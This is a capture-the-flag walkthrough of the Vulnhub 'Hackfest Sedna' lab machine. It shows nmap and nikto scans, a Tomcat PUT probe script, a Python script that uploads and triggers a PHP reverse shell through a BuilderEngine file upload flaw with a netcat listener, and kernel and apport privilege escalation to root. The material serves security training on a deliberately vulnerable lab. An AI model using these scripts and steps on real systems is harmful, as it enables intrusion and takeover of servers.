Vulnhub

Hackfest Sedna

Reconnaissance/Enumeration

First we need to know what is running on the machine,
so we launch a general scan against the target:


nmap -vv -Pn -A -sC -sS -T 4 -p- 192.168.1.131

Discovered open port 139/tcp on 192.168.1.131

Discovered open port 445/tcp on 192.168.1.131
Discovered open port 995/tcp on 192.168.1.131
Discovered open port 8080/tcp on 192.168.1.131
Discovered open port 110/tcp on 192.168.1.131
Discovered open port 993/tcp on 192.168.1.131
Discovered open port 143/tcp on 192.168.1.131
Discovered open port 53/tcp on 192.168.1.131
Discovered open port 111/tcp on 192.168.1.131
Discovered open port 80/tcp on 192.168.1.131
Discovered open port 22/tcp on 192.168.1.131
...

We get a lot of open ports.
The easiest ones to check first are the web ports (80 and 8080).

Web port 80

We browse http://192.168.1.131 to see what is going on there.

The only thing we get is a JPG telling us to click on it.
That brings us to another image. Looking at the page source confirms
there is nothing useful behind it.

Web port 8080

Another website we can browse is http://192.168.1.131:8080.
This time we get something more valuable:
a congratulations message telling us that Tomcat has been installed.

It also reveals a local filesystem path: /var/lib/tomcat7/webapps/ROOT/index.html
and tells us that Tomcat is installed with CATALINA_HOME set.
This page leads to plenty of other pages that give access to the Tomcat 7 example servlets.

There are a lot of them and I wasted a good hour looking at them.

Nikto

Now that we have two websites, we can run Nikto on both of them, hoping for something good.

nikto -h 192.168.1.131

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.1.131
+ Target Hostname:    192.168.1.131
+ Target Port:        80
+ Start Time:         2017-04-25 20:50:13 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0x65 0x53fb059bb5bc8 
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ "robots.txt" contains 1 entry which should be manually viewed.
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
+ OSVDB-3268: /files/: Directory indexing found.
+ OSVDB-3092: /files/: This might be interesting...
+ OSVDB-3092: /system/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ 7536 requests: 0 error(s) and 12 item(s) reported on remote host
+ End Time:           2017-04-25 20:50:28 (GMT-4) (15 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

The first website has /files/ and /system/ directories that we can look at.
Those directories lead to many files that appear to belong to a CMS,
but it is still not enough information to tell which one.

nikto -h 192.168.1.131:8080

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.1.131
+ Target Hostname:    192.168.1.131
+ Target Port:        8080
+ Start Time:         2017-04-25 20:52:03 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache-Coyote/1.1
+ Server leaks inodes via ETags, header found with file /, fields: 0xW/1895 0x1475867860000 
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS 
+ OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
+ /: Appears to be a default Apache Tomcat install.
+ /examples/servlets/index.html: Apache Tomcat default JSP pages present.
+ OSVDB-3720: /examples/jsp/snp/snoop.jsp: Displays information about page retrievals, including other users.
+ /manager/html: Default Tomcat Manager / Host Manager interface found
+ /host-manager/html: Default Tomcat Manager / Host Manager interface found
+ /manager/status: Default Tomcat Server Status interface found
+ 7839 requests: 0 error(s) and 13 item(s) reported on remote host
+ End Time:           2017-04-25 20:52:34 (GMT-4) (31 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

These results are interesting because of the PUT method in the Allow header.
I'll look into it; there's also snoop.jsp, which displays request information.
Both are worth a look.
We also have several paths (the manager and host-manager interfaces) locked behind a login.
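A caveat on that Nikto finding: Tomcat lists PUT in the Allow header because its DefaultServlet implements doPut, but the write is refused with 403 unless the servlet's readonly init-param has been set to false. The only reliable check is to try a harmless PUT and then fetch the file back. The script below does exactly that; it is an added example for this writeup, not something from the original post, and the host and port are taken from the scan above. It writes a uniquely named text file under the ROOT context, which you should delete afterwards on a real engagement.

```python
#!/usr/bin/env python3
"""Check whether a Tomcat that advertises PUT actually lets an anonymous
client write a file (DefaultServlet readonly=false). Added example for
this writeup; host and port come from the nmap/nikto output above."""
import http.client
import uuid

TARGET_HOST = "192.168.1.131"   # from the writeup
TARGET_PORT = 8080              # Tomcat, per nmap and nikto


def probe_path():
    """A unique, harmless filename under the web root (assumed: ROOT context)."""
    return "/put-probe-%s.txt" % uuid.uuid4().hex[:8]


def classify(put_status, get_status, get_body, marker):
    """Turn the PUT and follow-up GET results into a verdict.

    201 (created) or 204 (overwritten) on PUT, plus our marker served back
    on GET, means the DefaultServlet is writable. 403/405 is the Tomcat
    default (readonly=true). Anything else is reported but not treated as
    a usable write primitive."""
    if put_status in (201, 204) and get_status == 200 and marker in get_body:
        return "writable"
    if put_status in (403, 405):
        return "readonly"
    if put_status == 401:
        return "auth-required"
    if put_status in (200, 201, 204):
        return "accepted-but-not-served"
    return "unexpected:%d" % put_status


def request(conn, method, path, body=None, headers=None):
    conn.request(method, path, body=body, headers=headers or {})
    resp = conn.getresponse()
    return resp.status, resp.read().decode("utf-8", "replace")


def probe(host=TARGET_HOST, port=TARGET_PORT):
    """PUT a marker, GET it back, and classify. Returns (path, verdict)."""
    marker = "probe-" + uuid.uuid4().hex
    path = probe_path()
    conn = http.client.HTTPConnection(host, port, timeout=10)
    put_status, _ = request(conn, "PUT", path, body=marker.encode(),
                            headers={"Content-Type": "text/plain"})
    get_status, get_body = request(conn, "GET", path)
    conn.close()
    return path, classify(put_status, get_status, get_body, marker)


if __name__ == "__main__":
    print(probe())
```

If the verdict is "writable", a .jsp uploaded the same way would be compiled and executed by Tomcat; a "readonly" verdict is what you get on a stock install and explains why the PUT route goes nowhere on this box.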

Dirb

After looking at my options and trying a few different ways to use the PUT method, I tried something else:
I ran dirb on both websites, hoping to find more content that could lead somewhere.


dirb http://192.168.1.131 /usr/share/wordlists/dirb/common.txt
...

We get a lot of information with this command; we can see many folders such as blocks, modules, themes and system.

Looking at the files, I noticed "builder engine v3" fairly often.
I decided to go back to Nikto's findings and look at license.txt, and there it was:
a CMS called BuilderEngine by Radian Enterprise Systems Limited.

First thing is to search for "BuilderEngine exploit", which leads to https://www.exploit-db.com/exploits/40390/, an easy exploit that lets us upload a file directly to the server.
I wasted about 2 hours trying to find a way to upload a file when this was much easier.
I had to look at how other people ran this exploit to find out how simple it is.
We only need to replace the localhost part of the form action with the target address and save the file as .html.
From there we open the file in any browser and upload a file.
It is stored directly under http://192.168.1.131/files/. We upload the PHP reverse shell from pentestmonkey, with the listener address and port set to our machine.
We set up a netcat listener (with traditional netcat the port needs -p: nc -lvp 1234):

nc -lv 1234

Then we request the uploaded page, and voila, we have a shell.
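The same upload and trigger, scripted so it can be repeated without a browser. This is an added example for this writeup, not the exploit's own code. UPLOAD_PATH and FIELD_NAME are placeholders: copy the form's action path and its file-input name from the exploit's HTML; FILES_DIR is where this writeup saw uploads land. One practical detail the browser hides: the GET that starts a reverse shell does not return while the shell is alive, so the trigger request is sent with a short timeout and a timeout is treated as the expected outcome.

```python
#!/usr/bin/env python3
"""Replay the BuilderEngine upload from EDB 40390 and trigger the uploaded
PHP shell. Added example for this writeup, not the exploit's own code.
UPLOAD_PATH and FIELD_NAME are placeholders taken from the exploit's form."""
import http.client
import os
import socket
import sys
import uuid

TARGET_HOST = "192.168.1.131"             # from the writeup
UPLOAD_PATH = "/path/from/exploit/form/"  # placeholder: the form's action path
FIELD_NAME = "files[]"                    # placeholder: the form's file input name
FILES_DIR = "/files/"                     # uploads were served from here


def build_multipart(field, filename, content, boundary,
                    content_type="application/octet-stream"):
    """Hand-build a single-file multipart/form-data body so every byte is
    known. Returns (body_bytes, value for the Content-Type header)."""
    crlf = b"\r\n"
    b = boundary.encode()
    disposition = ('Content-Disposition: form-data; name="%s"; filename="%s"'
                   % (field, filename))
    body = (b"--" + b + crlf
            + disposition.encode() + crlf
            + b"Content-Type: " + content_type.encode() + crlf + crlf
            + content + crlf
            + b"--" + b + b"--" + crlf)
    return body, "multipart/form-data; boundary=" + boundary


def shell_url(host, filename, files_dir=FILES_DIR):
    """URL the uploaded file is served from, per the writeup's observation."""
    return "http://%s%s%s" % (host, files_dir, filename)


def upload(host, path, field, filename, content):
    """POST the file; returns (status, response body) for inspection."""
    boundary = "----pyupload" + uuid.uuid4().hex
    body, ctype = build_multipart(field, filename, content, boundary)
    conn = http.client.HTTPConnection(host, 80, timeout=15)
    conn.request("POST", path, body=body, headers={"Content-Type": ctype})
    resp = conn.getresponse()
    data = resp.read().decode("utf-8", "replace")
    conn.close()
    return resp.status, data


def trigger(host, files_dir, filename, timeout=5):
    """GET the uploaded PHP. A reverse shell keeps this request open for as
    long as the shell lives, so a timeout here is the success case."""
    conn = http.client.HTTPConnection(host, 80, timeout=timeout)
    try:
        conn.request("GET", files_dir + filename)
        return conn.getresponse().status
    except socket.timeout:
        return None  # shell is most likely connected back to the listener
    finally:
        conn.close()


if __name__ == "__main__":
    # usage: python3 upload.py php-reverse-shell.php   (listener already running)
    local = sys.argv[1]
    name = os.path.basename(local)
    with open(local, "rb") as f:
        print("upload:", upload(TARGET_HOST, UPLOAD_PATH, FIELD_NAME, name, f.read()))
    print("trigger:", trigger(TARGET_HOST, FILES_DIR, name), shell_url(TARGET_HOST, name))
```

Building the multipart body by hand rather than through a library keeps the request identical to what the exploit's form sends, which matters when an upload handler is picky about field names or the Content-Type of the part.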

More flags

Now that we have access to the machine, we need to find a way to escalate
privileges.

We're currently running as the user www-data,
the account the web server runs as.

First thing that we should do is look at the kernel version and OS.

uname -a

Linux Sedna 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014 i686
i686 i686 GNU/Linux

We have kernel 3.13.0-32 on a 32-bit (i686) Ubuntu build.

We’ll now find the OS Version.

cat /etc/lsb-rel*

DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=14.04
DISTRIB_CODENAME=trusty
DISTRIB_DESCRIPTION="Ubuntu 14.04.1 LTS"

Easy enough: we have the kernel and OS versions. Next step is to look in Exploit-DB
for exploits matching those versions.

Using searchsploit we can search by keyword:

searchsploit 3.13 local

--------------------------------------------------------------------------------------------------------------------- ----------------------------------
 Exploit Title                                                                                                       |  Path
                                                                                                                     | (/usr/share/exploitdb/platforms)
--------------------------------------------------------------------------------------------------------------------- ----------------------------------
Apple Mac OSX xnu 1228.3.13 - (macfsstat) Local Kernel Memory Leak/Denial of Service                                 | ./osx/dos/8263.c
pam-krb5 < 3.13 - Privilege Escalation                                                                               | ./linux/local/8303.c
Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.10) - 'CONFIG_X86_X32' Arbitrary Write Exploit (2)                              | ./linux/local/31346.c
Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.04/13.10) - 'CONFIG_X86_X32=y' Privilege Escalation (3)                         | ./linux/local/31347.c
Linux Kernel 3.13 - Privilege Escalation PoC (gid)                                                                   | ./linux/local/33824.c
Linux Kernel 3.13 / 3.14 (Ubuntu) - 'splice()' System Call Local Denial of Service                                   | ./linux/dos/36743.c
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Privilege Escalation                       | ./linux/local/37292.c
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Privilege Escalation (Access /etc/shadow)  | ./linux/local/37293.txt
--------------------------------------------------------------------------------------------------------------------- ----------------------------------

This tool is so useful for quickly finding the right exploits. I used 3.13 for the kernel version and local for local privilege escalation.

We can see that we have a bunch of eligible exploits that we can try running on Sedna.

I tried running 37292 but it wouldn't work. It compiled and executed correctly, but the id wasn't changing. It's a no go.

Then I tried 33824 and that one worked. It allowed me to change permissions of files, but I couldn't make it work on directories. So that was half a win.

I had to find another way to get root.

More enumeration

After some Google searching I found that this Ubuntu release was vulnerable to another privilege escalation because of a service called apport.

The exploit is 36746.

After more googling I found out what apport was, and I looked on Sedna to see whether the service was present.

cat /etc/services

I tried looking for the service in there and couldn't find it (/etc/services only maps port numbers to protocol names; it says nothing about what is installed).

service --status-all

That command lists all services, running or not.

apport was in the list.

So I looked for the command so I could try running it.

A little bit of googling led me to apport-cli:

apport-cli

No pending crash reports. Try --help for more information.

And there it is! The command is on the system.
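The kernel and OS checks above and this apport check can be folded into one local enumeration script. This is an added example for this writeup, not code from the exploit. Two points it adds to what was done by hand: it compares the running kernel against the version ranges searchsploit prints in its titles (such as "3.13.0 < 3.19"), and for apport it checks /proc/sys/kernel/core_pattern, which is the setting that actually makes apport the kernel's crash handler, rather than only whether the apport-cli binary exists. The text samples in the lead-in's tests are constructed; run the script on the target for live data.

```python
#!/usr/bin/env python3
"""Local enumeration for the privilege-escalation step: kernel, distro and
whether apport is installed and registered as the crash handler. Added
example for this writeup, not the exploit's code."""
import os
import re
import shutil


def parse_lsb(text):
    """Turn /etc/lsb-release (KEY=VALUE, optionally quoted) into a dict."""
    out = {}
    for line in text.splitlines():
        if "=" not in line or line.lstrip().startswith("#"):
            continue
        key, _, value = line.partition("=")
        out[key.strip()] = value.strip().strip('"')
    return out


def kernel_tuple(release):
    """'3.13.0-32-generic' -> (3, 13, 0, 32); missing fields become 0."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?(?:-(\d+))?", release)
    if not m:
        raise ValueError("unrecognised kernel release: %r" % release)
    return tuple(int(x) if x is not None else 0 for x in m.groups())


def in_range(release, low, high):
    """True when low <= release < high on major.minor.patch, the shape
    searchsploit titles such as 'Linux Kernel 3.13.0 < 3.19' use."""
    k = kernel_tuple(release)[:3]
    return kernel_tuple(low)[:3] <= k < kernel_tuple(high)[:3]


def apport_is_core_handler(core_pattern):
    """core_pattern starting with '|' pipes core dumps to a program; on
    Ubuntu that program is apport. This, not the presence of apport-cli,
    is what the apport race (EDB 36746) relies on."""
    core_pattern = core_pattern.strip()
    return core_pattern.startswith("|") and "apport" in core_pattern


def apport_enabled(default_apport_text):
    """/etc/default/apport carries enabled=0 or enabled=1."""
    m = re.search(r"^\s*enabled\s*=\s*(\d)", default_apport_text, re.M)
    return bool(m) and m.group(1) == "1"


def read(path):
    try:
        with open(path) as f:
            return f.read()
    except OSError:
        return ""


def enumerate_host():
    """Collect everything on the running machine into one dict."""
    u = os.uname()
    lsb = parse_lsb(read("/etc/lsb-release"))
    return {
        "kernel": u.release,
        "arch": u.machine,
        "distro": lsb.get("DISTRIB_DESCRIPTION", "unknown"),
        "overlayfs_range_3.13.0_to_3.19": in_range(u.release, "3.13.0", "3.19"),
        "apport_cli": shutil.which("apport-cli"),
        "apport_core_handler": apport_is_core_handler(read("/proc/sys/kernel/core_pattern")),
        "apport_enabled": apport_enabled(read("/etc/default/apport")),
    }


if __name__ == "__main__":
    for key, value in enumerate_host().items():
        print("%-32s %s" % (key, value))
```

The version-range check only narrows the candidate list; as the failed 37292 attempt shows, a kernel inside the advertised range can still be patched by the distro, so each candidate still has to be run.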

We transfer the exploit over, build it and run it:

./apport

id
uid=0(root) gid=33(www-data) groups=0(root),33(www-data)

And there we have it. We got root!

cd /root
cat flag.txt

Post exploitation

We need to find two flags hidden in the system.

A simple find through the filesystem for flag.txt turned up the first flag.

It was in /var/log/flag.txt

There's a second one hidden.

It's most probably linked to the user crackmeforpoints found in the /etc/passwd file.